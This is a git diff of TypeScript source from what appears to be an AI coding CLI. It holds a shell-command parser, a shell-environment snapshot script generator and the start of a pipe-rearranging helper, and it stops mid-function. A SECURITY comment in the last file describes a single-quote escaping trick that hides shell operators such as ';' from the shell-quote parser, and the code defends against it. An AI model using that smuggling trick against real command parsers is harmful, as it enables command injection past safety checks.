init claude-code

2026-04-01 17:32:37 +02:00
commit 73b208c009
1902 changed files with 513237 additions and 0 deletions
@@ -0,0 +1,318 @@
+import memoize from 'lodash-es/memoize.js'
+import {
+  extractOutputRedirections,
+  splitCommandWithOperators,
+} from './commands.js'
+import type { Node } from './parser.js'
+import {
+  analyzeCommand,
+  type TreeSitterAnalysis,
+} from './treeSitterAnalysis.js'
+
+export type OutputRedirection = {
+  target: string
+  operator: '>' | '>>'
+}
+
+/**
+ * Interface for parsed command implementations.
+ * Both tree-sitter and regex fallback implementations conform to this.
+ */
+export interface IParsedCommand {
+  readonly originalCommand: string
+  toString(): string
+  getPipeSegments(): string[]
+  withoutOutputRedirections(): string
+  getOutputRedirections(): OutputRedirection[]
+  /**
+   * Returns tree-sitter analysis data if available.
+   * Returns null for the regex fallback implementation.
+   */
+  getTreeSitterAnalysis(): TreeSitterAnalysis | null
+}
+
+/**
+ * @deprecated Legacy regex/shell-quote path. Only used when tree-sitter is
+ * unavailable. The primary gate is parseForSecurity (ast.ts).
+ *
+ * Regex-based fallback implementation using shell-quote parser.
+ * Used when tree-sitter is not available.
+ * Exported for testing purposes.
+ */
+export class RegexParsedCommand_DEPRECATED implements IParsedCommand {
+  readonly originalCommand: string
+
+  constructor(command: string) {
+    this.originalCommand = command
+  }
+
+  toString(): string {
+    return this.originalCommand
+  }
+
+  getPipeSegments(): string[] {
+    try {
+      const parts = splitCommandWithOperators(this.originalCommand)
+      const segments: string[] = []
+      let currentSegment: string[] = []
+
+      for (const part of parts) {
+        if (part === '|') {
+          if (currentSegment.length > 0) {
+            segments.push(currentSegment.join(' '))
+            currentSegment = []
+          }
+        } else {
+          currentSegment.push(part)
+        }
+      }
+
+      if (currentSegment.length > 0) {
+        segments.push(currentSegment.join(' '))
+      }
+
+      return segments.length > 0 ? segments : [this.originalCommand]
+    } catch {
+      return [this.originalCommand]
+    }
+  }
+
+  withoutOutputRedirections(): string {
+    if (!this.originalCommand.includes('>')) {
+      return this.originalCommand
+    }
+    const { commandWithoutRedirections, redirections } =
+      extractOutputRedirections(this.originalCommand)
+    return redirections.length > 0
+      ? commandWithoutRedirections
+      : this.originalCommand
+  }
+
+  getOutputRedirections(): OutputRedirection[] {
+    const { redirections } = extractOutputRedirections(this.originalCommand)
+    return redirections
+  }
+
+  getTreeSitterAnalysis(): TreeSitterAnalysis | null {
+    return null
+  }
+}
+
+type RedirectionNode = OutputRedirection & {
+  startIndex: number
+  endIndex: number
+}
+
+function visitNodes(node: Node, visitor: (node: Node) => void): void {
+  visitor(node)
+  for (const child of node.children) {
+    visitNodes(child, visitor)
+  }
+}
+
+function extractPipePositions(rootNode: Node): number[] {
+  const pipePositions: number[] = []
+  visitNodes(rootNode, node => {
+    if (node.type === 'pipeline') {
+      for (const child of node.children) {
+        if (child.type === '|') {
+          pipePositions.push(child.startIndex)
+        }
+      }
+    }
+  })
+  // visitNodes is depth-first. For `a | b && c | d`, the outer `list` nests
+  // the second pipeline as a sibling of the first, so the outer `|` is
+  // visited before the inner one — positions arrive out of order.
+  // getPipeSegments iterates them to slice left-to-right, so sort here.
+  return pipePositions.sort((a, b) => a - b)
+}
+
+function extractRedirectionNodes(rootNode: Node): RedirectionNode[] {
+  const redirections: RedirectionNode[] = []
+  visitNodes(rootNode, node => {
+    if (node.type === 'file_redirect') {
+      const children = node.children
+      const op = children.find(c => c.type === '>' || c.type === '>>')
+      const target = children.find(c => c.type === 'word')
+      if (op && target) {
+        redirections.push({
+          startIndex: node.startIndex,
+          endIndex: node.endIndex,
+          target: target.text,
+          operator: op.type as '>' | '>>',
+        })
+      }
+    }
+  })
+  return redirections
+}
+
+class TreeSitterParsedCommand implements IParsedCommand {
+  readonly originalCommand: string
+  // Tree-sitter's startIndex/endIndex are UTF-8 byte offsets, but JS
+  // String.slice() uses UTF-16 code-unit indices. For ASCII they coincide;
+  // for multi-byte code points (e.g. `—` U+2014: 3 UTF-8 bytes, 1 code unit)
+  // they diverge and slicing the string directly lands mid-token. Slicing
+  // the UTF-8 Buffer with tree-sitter's byte offsets and decoding back to
+  // string is correct regardless of code-point width.
+  private readonly commandBytes: Buffer
+  private readonly pipePositions: number[]
+  private readonly redirectionNodes: RedirectionNode[]
+  private readonly treeSitterAnalysis: TreeSitterAnalysis
+
+  constructor(
+    command: string,
+    pipePositions: number[],
+    redirectionNodes: RedirectionNode[],
+    treeSitterAnalysis: TreeSitterAnalysis,
+  ) {
+    this.originalCommand = command
+    this.commandBytes = Buffer.from(command, 'utf8')
+    this.pipePositions = pipePositions
+    this.redirectionNodes = redirectionNodes
+    this.treeSitterAnalysis = treeSitterAnalysis
+  }
+
+  toString(): string {
+    return this.originalCommand
+  }
+
+  getPipeSegments(): string[] {
+    if (this.pipePositions.length === 0) {
+      return [this.originalCommand]
+    }
+
+    const segments: string[] = []
+    let currentStart = 0
+
+    for (const pipePos of this.pipePositions) {
+      const segment = this.commandBytes
+        .subarray(currentStart, pipePos)
+        .toString('utf8')
+        .trim()
+      if (segment) {
+        segments.push(segment)
+      }
+      currentStart = pipePos + 1
+    }
+
+    const lastSegment = this.commandBytes
+      .subarray(currentStart)
+      .toString('utf8')
+      .trim()
+    if (lastSegment) {
+      segments.push(lastSegment)
+    }
+
+    return segments
+  }
+
+  withoutOutputRedirections(): string {
+    if (this.redirectionNodes.length === 0) return this.originalCommand
+
+    const sorted = [...this.redirectionNodes].sort(
+      (a, b) => b.startIndex - a.startIndex,
+    )
+
+    let result = this.commandBytes
+    for (const redir of sorted) {
+      result = Buffer.concat([
+        result.subarray(0, redir.startIndex),
+        result.subarray(redir.endIndex),
+      ])
+    }
+    return result.toString('utf8').trim().replace(/\s+/g, ' ')
+  }
+
+  getOutputRedirections(): OutputRedirection[] {
+    return this.redirectionNodes.map(({ target, operator }) => ({
+      target,
+      operator,
+    }))
+  }
+
+  getTreeSitterAnalysis(): TreeSitterAnalysis {
+    return this.treeSitterAnalysis
+  }
+}
+
+const getTreeSitterAvailable = memoize(async (): Promise<boolean> => {
+  try {
+    const { parseCommand } = await import('./parser.js')
+    const testResult = await parseCommand('echo test')
+    return testResult !== null
+  } catch {
+    return false
+  }
+})
+
+/**
+ * Build a TreeSitterParsedCommand from a pre-parsed AST root. Lets callers
+ * that already have the tree skip the redundant native.parse that
+ * ParsedCommand.parse would do.
+ */
+export function buildParsedCommandFromRoot(
+  command: string,
+  root: Node,
+): IParsedCommand {
+  const pipePositions = extractPipePositions(root)
+  const redirectionNodes = extractRedirectionNodes(root)
+  const analysis = analyzeCommand(root, command)
+  return new TreeSitterParsedCommand(
+    command,
+    pipePositions,
+    redirectionNodes,
+    analysis,
+  )
+}
+
+async function doParse(command: string): Promise<IParsedCommand | null> {
+  if (!command) return null
+
+  const treeSitterAvailable = await getTreeSitterAvailable()
+  if (treeSitterAvailable) {
+    try {
+      const { parseCommand } = await import('./parser.js')
+      const data = await parseCommand(command)
+      if (data) {
+        // Native NAPI parser returns plain JS objects (no WASM handles);
+        // nothing to free — extract directly.
+        return buildParsedCommandFromRoot(command, data.rootNode)
+      }
+    } catch {
+      // Fall through to regex implementation
+    }
+  }
+
+  // Fallback to regex implementation
+  return new RegexParsedCommand_DEPRECATED(command)
+}
+
+// Single-entry cache: legacy callers (bashCommandIsSafeAsync,
+// buildSegmentWithoutRedirections) may call ParsedCommand.parse repeatedly
+// with the same command string. Each parse() is ~1 native.parse + ~6 tree
+// walks, so caching the most recent command skips the redundant work.
+// Size-1 bound avoids leaking TreeSitterParsedCommand instances.
+let lastCmd: string | undefined
+let lastResult: Promise<IParsedCommand | null> | undefined
+
+/**
+ * ParsedCommand provides methods for working with shell commands.
+ * Uses tree-sitter when available for quote-aware parsing,
+ * falls back to regex-based parsing otherwise.
+ */
+export const ParsedCommand = {
+  /**
+   * Parse a command string and return a ParsedCommand instance.
+   * Returns null if parsing fails completely.
+   */
+  parse(command: string): Promise<IParsedCommand | null> {
+    if (command === lastCmd && lastResult !== undefined) {
+      return lastResult
+    }
+    lastCmd = command
+    lastResult = doParse(command)
+    return lastResult
+  },
+}
@@ -0,0 +1,582 @@
+import { execFile } from 'child_process'
+import { execa } from 'execa'
+import { mkdir, stat } from 'fs/promises'
+import * as os from 'os'
+import { join } from 'path'
+import { logEvent } from 'src/services/analytics/index.js'
+import { registerCleanup } from '../cleanupRegistry.js'
+import { getCwd } from '../cwd.js'
+import { logForDebugging } from '../debug.js'
+import {
+  embeddedSearchToolsBinaryPath,
+  hasEmbeddedSearchTools,
+} from '../embeddedTools.js'
+import { getClaudeConfigHomeDir } from '../envUtils.js'
+import { pathExists } from '../file.js'
+import { getFsImplementation } from '../fsOperations.js'
+import { logError } from '../log.js'
+import { getPlatform } from '../platform.js'
+import { ripgrepCommand } from '../ripgrep.js'
+import { subprocessEnv } from '../subprocessEnv.js'
+import { quote } from './shellQuote.js'
+
+const LITERAL_BACKSLASH = '\\'
+const SNAPSHOT_CREATION_TIMEOUT = 10000 // 10 seconds
+
+/**
+ * Creates a shell function that invokes `binaryPath` with a specific argv[0].
+ * This uses the bun-internal ARGV0 dispatch trick: the bun binary checks its
+ * argv[0] and runs the embedded tool (rg, bfs, ugrep) that matches.
+ *
+ * @param prependArgs - Arguments to inject before the user's args (e.g.,
+ *   default flags). Injected literally; each element must be a valid shell
+ *   word (no spaces/special chars).
+ */
+function createArgv0ShellFunction(
+  funcName: string,
+  argv0: string,
+  binaryPath: string,
+  prependArgs: string[] = [],
+): string {
+  const quotedPath = quote([binaryPath])
+  const argSuffix =
+    prependArgs.length > 0 ? `${prependArgs.join(' ')} "$@"` : '"$@"'
+  return [
+    `function ${funcName} {`,
+    '  if [[ -n $ZSH_VERSION ]]; then',
+    `    ARGV0=${argv0} ${quotedPath} ${argSuffix}`,
+    '  elif [[ "$OSTYPE" == "msys" ]] || [[ "$OSTYPE" == "cygwin" ]] || [[ "$OSTYPE" == "win32" ]]; then',
+    // On Windows (git bash), exec -a does not work, so use ARGV0 env var instead
+    // The bun binary reads from ARGV0 natively to set argv[0]
+    `    ARGV0=${argv0} ${quotedPath} ${argSuffix}`,
+    '  elif [[ $BASHPID != $$ ]]; then',
+    `    exec -a ${argv0} ${quotedPath} ${argSuffix}`,
+    '  else',
+    `    (exec -a ${argv0} ${quotedPath} ${argSuffix})`,
+    '  fi',
+    '}',
+  ].join('\n')
+}
+
+/**
+ * Creates ripgrep shell integration (alias or function)
+ * @returns Object with type and the shell snippet to use
+ */
+export function createRipgrepShellIntegration(): {
+  type: 'alias' | 'function'
+  snippet: string
+} {
+  const rgCommand = ripgrepCommand()
+
+  // For embedded ripgrep (bun-internal), we need a shell function that sets argv0
+  if (rgCommand.argv0) {
+    return {
+      type: 'function',
+      snippet: createArgv0ShellFunction(
+        'rg',
+        rgCommand.argv0,
+        rgCommand.rgPath,
+      ),
+    }
+  }
+
+  // For regular ripgrep, use a simple alias target
+  const quotedPath = quote([rgCommand.rgPath])
+  const quotedArgs = rgCommand.rgArgs.map(arg => quote([arg]))
+  const aliasTarget =
+    rgCommand.rgArgs.length > 0
+      ? `${quotedPath} ${quotedArgs.join(' ')}`
+      : quotedPath
+
+  return { type: 'alias', snippet: aliasTarget }
+}
+
+/**
+ * VCS directories to exclude from grep searches. Matches the list in
+ * GrepTool (see GrepTool.ts: VCS_DIRECTORIES_TO_EXCLUDE).
+ */
+const VCS_DIRECTORIES_TO_EXCLUDE = [
+  '.git',
+  '.svn',
+  '.hg',
+  '.bzr',
+  '.jj',
+  '.sl',
+] as const
+
+/**
+ * Creates shell integration for `find` and `grep`, backed by bfs and ugrep
+ * embedded in the bun binary (ant-native only). Unlike the rg integration,
+ * this always shadows the system find/grep since bfs/ugrep are drop-in
+ * replacements and we want consistent fast behavior.
+ *
+ * These wrappers replace the GlobTool/GrepTool dedicated tools (which are
+ * removed from the tool registry when embedded search tools are available),
+ * so they're tuned to match those tools' semantics, not GNU find/grep.
+ *
+ * `find` ↔ GlobTool:
+ * - Inject `-regextype findutils-default`: bfs defaults to POSIX BRE for
+ *   -regex, but GNU find defaults to emacs-flavor (which supports `\|`
+ *   alternation). Without this, `find . -regex '.*\.\(js\|ts\)'` silently
+ *   returns zero results. A later user-supplied -regextype still overrides.
+ * - No gitignore filtering: GlobTool passes `--no-ignore` to rg. bfs has no
+ *   gitignore support anyway, so this matches by default.
+ * - Hidden files included: both GlobTool (`--hidden`) and bfs's default.
+ *
+ * Caveat: even with findutils-default, Oniguruma (bfs's regex engine) uses
+ * leftmost-first alternation, not POSIX leftmost-longest. Patterns where
+ * one alternative is a prefix of another (e.g., `\(ts\|tsx\)`) may miss
+ * matches that GNU find catches. Workaround: put the longer alternative first.
+ *
+ * `grep` ↔ GrepTool (file filtering) + GNU grep (regex syntax):
+ * - `-G` (basic regex / BRE): GNU grep defaults to BRE where `\|` is
+ *   alternation. ugrep defaults to ERE where `|` is alternation and `\|` is a
+ *   literal pipe. Without -G, `grep "foo\|bar"` silently returns zero results.
+ *   User-supplied `-E`, `-F`, or `-P` later in argv overrides this.
+ * - `--ignore-files`: respect .gitignore (GrepTool uses rg's default, which
+ *   respects gitignore). Override with `grep --no-ignore-files`.
+ * - `--hidden`: include hidden files (GrepTool passes `--hidden` to rg).
+ *   Override with `grep --no-hidden`.
+ * - `--exclude-dir` for VCS dirs: GrepTool passes `--glob '!.git'` etc. to rg.
+ * - `-I`: skip binary files. rg's recursion silently skips binary matches
+ *   by default (different from direct-file-arg behavior); ugrep doesn't, so
+ *   we inject -I to match. Override with `grep -a`.
+ *
+ * Not replicated from GrepTool:
+ * - `--max-columns 500`: ugrep's `--width` hard-truncates output which could
+ *   break pipelines; rg's version replaces the line with a placeholder.
+ * - Read deny rules / plugin cache exclusions: require toolPermissionContext
+ *   which isn't available at shell-snapshot creation time.
+ *
+ * Returns null if embedded search tools are not available in this build.
+ */
+export function createFindGrepShellIntegration(): string | null {
+  if (!hasEmbeddedSearchTools()) {
+    return null
+  }
+  const binaryPath = embeddedSearchToolsBinaryPath()
+  return [
+    // User shell configs may define aliases like `alias find=gfind` or
+    // `alias grep=ggrep` (common on macOS with Homebrew GNU tools). The
+    // snapshot sources user aliases before these function definitions, and
+    // bash expands aliases before function lookup — so a renaming alias
+    // would silently bypass the embedded bfs/ugrep dispatch. Clear them first
+    // (same fix the rg integration uses).
+    'unalias find 2>/dev/null || true',
+    'unalias grep 2>/dev/null || true',
+    createArgv0ShellFunction('find', 'bfs', binaryPath, [
+      '-regextype',
+      'findutils-default',
+    ]),
+    createArgv0ShellFunction('grep', 'ugrep', binaryPath, [
+      '-G',
+      '--ignore-files',
+      '--hidden',
+      '-I',
+      ...VCS_DIRECTORIES_TO_EXCLUDE.map(d => `--exclude-dir=${d}`),
+    ]),
+  ].join('\n')
+}
+
+function getConfigFile(shellPath: string): string {
+  const fileName = shellPath.includes('zsh')
+    ? '.zshrc'
+    : shellPath.includes('bash')
+      ? '.bashrc'
+      : '.profile'
+
+  const configPath = join(os.homedir(), fileName)
+
+  return configPath
+}
+
+/**
+ * Generates user-specific snapshot content (functions, options, aliases)
+ * This content is derived from the user's shell configuration file
+ */
+function getUserSnapshotContent(configFile: string): string {
+  const isZsh = configFile.endsWith('.zshrc')
+
+  let content = ''
+
+  // User functions
+  if (isZsh) {
+    content += `
+      echo "# Functions" >> "$SNAPSHOT_FILE"
+
+      # Force autoload all functions first
+      typeset -f > /dev/null 2>&1
+
+      # Now get user function names - filter completion functions (single underscore prefix)
+      # but keep double-underscore helpers (e.g. __zsh_like_cd from mise, __pyenv_init)
+      typeset +f | grep -vE '^_[^_]' | while read func; do
+        typeset -f "$func" >> "$SNAPSHOT_FILE"
+      done
+    `
+  } else {
+    content += `
+      echo "# Functions" >> "$SNAPSHOT_FILE"
+
+      # Force autoload all functions first
+      declare -f > /dev/null 2>&1
+
+      # Now get user function names - filter completion functions (single underscore prefix)
+      # but keep double-underscore helpers (e.g. __zsh_like_cd from mise, __pyenv_init)
+      declare -F | cut -d' ' -f3 | grep -vE '^_[^_]' | while read func; do
+        # Encode the function to base64, preserving all special characters
+        encoded_func=$(declare -f "$func" | base64 )
+        # Write the function definition to the snapshot
+        echo "eval ${LITERAL_BACKSLASH}"${LITERAL_BACKSLASH}$(echo '$encoded_func' | base64 -d)${LITERAL_BACKSLASH}" > /dev/null 2>&1" >> "$SNAPSHOT_FILE"
+      done
+    `
+  }
+
+  // Shell options
+  if (isZsh) {
+    content += `
+      echo "# Shell Options" >> "$SNAPSHOT_FILE"
+      setopt | sed 's/^/setopt /' | head -n 1000 >> "$SNAPSHOT_FILE"
+    `
+  } else {
+    content += `
+      echo "# Shell Options" >> "$SNAPSHOT_FILE"
+      shopt -p | head -n 1000 >> "$SNAPSHOT_FILE"
+      set -o | grep "on" | awk '{print "set -o " $1}' | head -n 1000 >> "$SNAPSHOT_FILE"
+      echo "shopt -s expand_aliases" >> "$SNAPSHOT_FILE"
+    `
+  }
+
+  // User aliases
+  content += `
+      echo "# Aliases" >> "$SNAPSHOT_FILE"
+      # Filter out winpty aliases on Windows to avoid "stdin is not a tty" errors
+      # Git Bash automatically creates aliases like "alias node='winpty node.exe'" for
+      # programs that need Win32 Console in mintty, but winpty fails when there's no TTY
+      if [[ "$OSTYPE" == "msys" ]] || [[ "$OSTYPE" == "cygwin" ]]; then
+        alias | grep -v "='winpty " | sed 's/^alias //g' | sed 's/^/alias -- /' | head -n 1000 >> "$SNAPSHOT_FILE"
+      else
+        alias | sed 's/^alias //g' | sed 's/^/alias -- /' | head -n 1000 >> "$SNAPSHOT_FILE"
+      fi
+  `
+
+  return content
+}
+
+/**
+ * Generates Claude Code specific snapshot content
+ * This content is always included regardless of user configuration
+ */
+async function getClaudeCodeSnapshotContent(): Promise<string> {
+  // Get the appropriate PATH based on platform
+  let pathValue = process.env.PATH
+  if (getPlatform() === 'windows') {
+    // On Windows with git-bash, read the Cygwin PATH
+    const cygwinResult = await execa('echo $PATH', {
+      shell: true,
+      reject: false,
+    })
+    if (cygwinResult.exitCode === 0 && cygwinResult.stdout) {
+      pathValue = cygwinResult.stdout.trim()
+    }
+    // Fall back to process.env.PATH if we can't get Cygwin PATH
+  }
+
+  const rgIntegration = createRipgrepShellIntegration()
+
+  let content = ''
+
+  // Check if rg is available, if not create an alias/function to bundled ripgrep
+  // We use a subshell to unalias rg before checking, so that user aliases like
+  // `alias rg='rg --smart-case'` don't shadow the real binary check. The subshell
+  // ensures we don't modify the user's aliases in the parent shell.
+  content += `
+      # Check for rg availability
+      echo "# Check for rg availability" >> "$SNAPSHOT_FILE"
+      echo "if ! (unalias rg 2>/dev/null; command -v rg) >/dev/null 2>&1; then" >> "$SNAPSHOT_FILE"
+  `
+
+  if (rgIntegration.type === 'function') {
+    // For embedded ripgrep, write the function definition using heredoc
+    content += `
+      cat >> "$SNAPSHOT_FILE" << 'RIPGREP_FUNC_END'
+  ${rgIntegration.snippet}
+RIPGREP_FUNC_END
+    `
+  } else {
+    // For regular ripgrep, write a simple alias
+    const escapedSnippet = rgIntegration.snippet.replace(/'/g, "'\\''")
+    content += `
+      echo '  alias rg='"'${escapedSnippet}'" >> "$SNAPSHOT_FILE"
+    `
+  }
+
+  content += `
+      echo "fi" >> "$SNAPSHOT_FILE"
+  `
+
+  // For ant-native builds, shadow find/grep with bfs/ugrep embedded in the bun
+  // binary. Unlike rg (which only activates if system rg is absent), we always
+  // shadow find/grep since bfs/ugrep are drop-in replacements and we want
+  // consistent fast behavior in Claude's shell.
+  const findGrepIntegration = createFindGrepShellIntegration()
+  if (findGrepIntegration !== null) {
+    content += `
+      # Shadow find/grep with embedded bfs/ugrep (ant-native only)
+      echo "# Shadow find/grep with embedded bfs/ugrep" >> "$SNAPSHOT_FILE"
+      cat >> "$SNAPSHOT_FILE" << 'FIND_GREP_FUNC_END'
+${findGrepIntegration}
+FIND_GREP_FUNC_END
+    `
+  }
+
+  // Add PATH to the file
+  content += `
+
+      # Add PATH to the file
+      echo "export PATH=${quote([pathValue || ''])}" >> "$SNAPSHOT_FILE"
+  `
+
+  return content
+}
+
+/**
+ * Creates the appropriate shell script for capturing environment
+ */
+async function getSnapshotScript(
+  shellPath: string,
+  snapshotFilePath: string,
+  configFileExists: boolean,
+): Promise<string> {
+  const configFile = getConfigFile(shellPath)
+  const isZsh = configFile.endsWith('.zshrc')
+
+  // Generate the user content and Claude Code content
+  const userContent = configFileExists
+    ? getUserSnapshotContent(configFile)
+    : !isZsh
+      ? // we need to manually force alias expansion in bash - normally `getUserSnapshotContent` takes care of this
+        'echo "shopt -s expand_aliases" >> "$SNAPSHOT_FILE"'
+      : ''
+  const claudeCodeContent = await getClaudeCodeSnapshotContent()
+
+  const script = `SNAPSHOT_FILE=${quote([snapshotFilePath])}
+      ${configFileExists ? `source "${configFile}" < /dev/null` : '# No user config file to source'}
+
+      # First, create/clear the snapshot file
+      echo "# Snapshot file" >| "$SNAPSHOT_FILE"
+
+      # When this file is sourced, we first unalias to avoid conflicts
+      # This is necessary because aliases get "frozen" inside function definitions at definition time,
+      # which can cause unexpected behavior when functions use commands that conflict with aliases
+      echo "# Unset all aliases to avoid conflicts with functions" >> "$SNAPSHOT_FILE"
+      echo "unalias -a 2>/dev/null || true" >> "$SNAPSHOT_FILE"
+
+      ${userContent}
+
+      ${claudeCodeContent}
+
+      # Exit silently on success, only report errors
+      if [ ! -f "$SNAPSHOT_FILE" ]; then
+        echo "Error: Snapshot file was not created at $SNAPSHOT_FILE" >&2
+        exit 1
+      fi
+    `
+
+  return script
+}
+
+/**
+ * Creates and saves the shell environment snapshot by loading the user's shell configuration
+ *
+ * This function is a critical part of Claude CLI's shell integration strategy. It:
+ *
+ * 1. Identifies the user's shell config file (.zshrc, .bashrc, etc.)
+ * 2. Creates a temporary script that sources this configuration file
+ * 3. Captures the resulting shell environment state including:
+ *    - Functions defined in the user's shell configuration
+ *    - Shell options and settings that affect command behavior
+ *    - Aliases that the user has defined
+ *
+ * The snapshot is saved to a temporary file that can be sourced by subsequent shell
+ * commands, ensuring they run with the user's expected environment, aliases, and functions.
+ *
+ * This approach allows Claude CLI to execute commands as if they were run in the user's
+ * interactive shell, while avoiding the overhead of creating a new login shell for each command.
+ * It handles both Bash and Zsh shells with their different syntax for functions, options, and aliases.
+ *
+ * If the snapshot creation fails (e.g., timeout, permissions issues), the CLI will still
+ * function but without the user's custom shell environment, potentially missing aliases
+ * and functions the user relies on.
+ *
+ * @returns Promise that resolves to the snapshot file path or undefined if creation failed
+ */
+export const createAndSaveSnapshot = async (
+  binShell: string,
+): Promise<string | undefined> => {
+  const shellType = binShell.includes('zsh')
+    ? 'zsh'
+    : binShell.includes('bash')
+      ? 'bash'
+      : 'sh'
+
+  logForDebugging(`Creating shell snapshot for ${shellType} (${binShell})`)
+
+  return new Promise(async resolve => {
+    try {
+      const configFile = getConfigFile(binShell)
+      logForDebugging(`Looking for shell config file: ${configFile}`)
+      const configFileExists = await pathExists(configFile)
+
+      if (!configFileExists) {
+        logForDebugging(
+          `Shell config file not found: ${configFile}, creating snapshot with Claude Code defaults only`,
+        )
+      }
+
+      // Create unique snapshot path with timestamp and random ID
+      const timestamp = Date.now()
+      const randomId = Math.random().toString(36).substring(2, 8)
+      const snapshotsDir = join(getClaudeConfigHomeDir(), 'shell-snapshots')
+      logForDebugging(`Snapshots directory: ${snapshotsDir}`)
+      const shellSnapshotPath = join(
+        snapshotsDir,
+        `snapshot-${shellType}-${timestamp}-${randomId}.sh`,
+      )
+
+      // Ensure snapshots directory exists
+      await mkdir(snapshotsDir, { recursive: true })
+
+      const snapshotScript = await getSnapshotScript(
+        binShell,
+        shellSnapshotPath,
+        configFileExists,
+      )
+      logForDebugging(`Creating snapshot at: ${shellSnapshotPath}`)
+      logForDebugging(`Execution timeout: ${SNAPSHOT_CREATION_TIMEOUT}ms`)
+      execFile(
+        binShell,
+        ['-c', '-l', snapshotScript],
+        {
+          env: {
+            ...((process.env.CLAUDE_CODE_DONT_INHERIT_ENV
+              ? {}
+              : subprocessEnv()) as typeof process.env),
+            SHELL: binShell,
+            GIT_EDITOR: 'true',
+            CLAUDECODE: '1',
+          },
+          timeout: SNAPSHOT_CREATION_TIMEOUT,
+          maxBuffer: 1024 * 1024, // 1MB buffer
+          encoding: 'utf8',
+        },
+        async (error, stdout, stderr) => {
+          if (error) {
+            const execError = error as Error & {
+              killed?: boolean
+              signal?: string
+              code?: number
+            }
+            logForDebugging(`Shell snapshot creation failed: ${error.message}`)
+            logForDebugging(`Error details:`)
+            logForDebugging(`  - Error code: ${execError?.code}`)
+            logForDebugging(`  - Error signal: ${execError?.signal}`)
+            logForDebugging(`  - Error killed: ${execError?.killed}`)
+            logForDebugging(`  - Shell path: ${binShell}`)
+            logForDebugging(`  - Config file: ${getConfigFile(binShell)}`)
+            logForDebugging(`  - Config file exists: ${configFileExists}`)
+            logForDebugging(`  - Working directory: ${getCwd()}`)
+            logForDebugging(`  - Claude home: ${getClaudeConfigHomeDir()}`)
+            logForDebugging(`Full snapshot script:\n${snapshotScript}`)
+            if (stdout) {
+              logForDebugging(
+                `stdout output (${stdout.length} chars):\n${stdout}`,
+              )
+            } else {
+              logForDebugging(`No stdout output captured`)
+            }
+            if (stderr) {
+              logForDebugging(
+                `stderr output (${stderr.length} chars): ${stderr}`,
+              )
+            } else {
+              logForDebugging(`No stderr output captured`)
+            }
+            logError(
+              new Error(`Failed to create shell snapshot: ${error.message}`),
+            )
+            // Convert signal name to number if present
+            const signalNumber = execError?.signal
+              ? os.constants.signals[
+                  execError.signal as keyof typeof os.constants.signals
+                ]
+              : undefined
+            logEvent('tengu_shell_snapshot_failed', {
+              stderr_length: stderr?.length || 0,
+              has_error_code: !!execError?.code,
+              error_signal_number: signalNumber,
+              error_killed: execError?.killed,
+            })
+            resolve(undefined)
+          } else {
+            let snapshotSize: number | undefined
+            try {
+              snapshotSize = (await stat(shellSnapshotPath)).size
+            } catch {
+              // Snapshot file not found
+            }
+
+            if (snapshotSize !== undefined) {
+              logForDebugging(
+                `Shell snapshot created successfully (${snapshotSize} bytes)`,
+              )
+
+              // Register cleanup to remove snapshot on graceful shutdown
+              registerCleanup(async () => {
+                try {
+                  await getFsImplementation().unlink(shellSnapshotPath)
+                  logForDebugging(
+                    `Cleaned up session snapshot: ${shellSnapshotPath}`,
+                  )
+                } catch (error) {
+                  logForDebugging(
+                    `Error cleaning up session snapshot: ${error}`,
+                  )
+                }
+              })
+
+              resolve(shellSnapshotPath)
+            } else {
+              logForDebugging(
+                `Shell snapshot file not found after creation: ${shellSnapshotPath}`,
+              )
+              logForDebugging(
+                `Checking if parent directory still exists: ${snapshotsDir}`,
+              )
+              try {
+                const dirContents =
+                  await getFsImplementation().readdir(snapshotsDir)
+                logForDebugging(
+                  `Directory contains ${dirContents.length} files`,
+                )
+              } catch {
+                logForDebugging(
+                  `Parent directory does not exist or is not accessible: ${snapshotsDir}`,
+                )
+              }
+              logEvent('tengu_shell_unknown_error', {})
+              resolve(undefined)
+            }
+          }
+        },
+      )
+    } catch (error) {
+      logForDebugging(`Unexpected error during snapshot creation: ${error}`)
+      if (error instanceof Error) {
+        logForDebugging(`Error stack trace: ${error.stack}`)
+      }
+      logError(error)
+      logEvent('tengu_shell_snapshot_error', {})
+      resolve(undefined)
+    }
+  })
+}
@@ -0,0 +1,294 @@
+import {
+  hasMalformedTokens,
+  hasShellQuoteSingleQuoteBug,
+  type ParseEntry,
+  quote,
+  tryParseShellCommand,
+} from './shellQuote.js'
+
+/**
+ * Rearranges a command with pipes to place stdin redirect after the first command.
+ * This fixes an issue where eval treats the entire piped command as a single unit,
+ * causing the stdin redirect to apply to eval itself rather than the first command.
+ */
+export function rearrangePipeCommand(command: string): string {
+  // Skip if command has backticks - shell-quote doesn't handle them well
+  if (command.includes('`')) {
+    return quoteWithEvalStdinRedirect(command)
+  }
+
+  // Skip if command has command substitution - shell-quote parses $() incorrectly,
+  // treating ( and ) as separate operators instead of recognizing command substitution
+  if (command.includes('$(')) {
+    return quoteWithEvalStdinRedirect(command)
+  }
+
+  // Skip if command references shell variables ($VAR, ${VAR}). shell-quote's parse()
+  // expands these to empty string when no env is passed, silently dropping the
+  // reference. Even if we preserved the token via an env function, quote() would
+  // then escape the $ during rebuild, preventing runtime expansion. See #9732.
+  if (/\$[A-Za-z_{]/.test(command)) {
+    return quoteWithEvalStdinRedirect(command)
+  }
+
+  // Skip if command contains bash control structures (for/while/until/if/case/select)
+  // shell-quote cannot parse these correctly and will incorrectly find pipes inside
+  // the control structure body, breaking the command when rearranged
+  if (containsControlStructure(command)) {
+    return quoteWithEvalStdinRedirect(command)
+  }
+
+  // Join continuation lines before parsing: shell-quote doesn't handle \<newline>
+  // and produces empty string tokens for each occurrence, causing spurious empty
+  // arguments in the reconstructed command
+  const joined = joinContinuationLines(command)
+
+  // shell-quote treats bare newlines as whitespace, not command separators.
+  // Parsing+rebuilding 'cmd1 | head\ncmd2 | grep' yields 'cmd1 | head cmd2 | grep',
+  // silently merging pipelines. Line-continuation (\<newline>) is already stripped
+  // above; any remaining newline is a real separator. Bail to the eval fallback,
+  // which preserves the newline inside a single-quoted arg. See #32515.
+  if (joined.includes('\n')) {
+    return quoteWithEvalStdinRedirect(command)
+  }
+
+  // SECURITY: shell-quote treats \' inside single quotes as an escape, but
+  // bash treats it as literal \ followed by a closing quote. The pattern
+  // '\' <payload> '\' makes shell-quote merge <payload> into the quoted
+  // string, hiding operators like ; from the token stream. Rebuilding from
+  // that merged token can expose the operators when bash re-parses.
+  if (hasShellQuoteSingleQuoteBug(joined)) {
+    return quoteWithEvalStdinRedirect(command)
+  }
+
+  const parseResult = tryParseShellCommand(joined)
+
+  // If parsing fails (malformed syntax), fall back to quoting the whole command
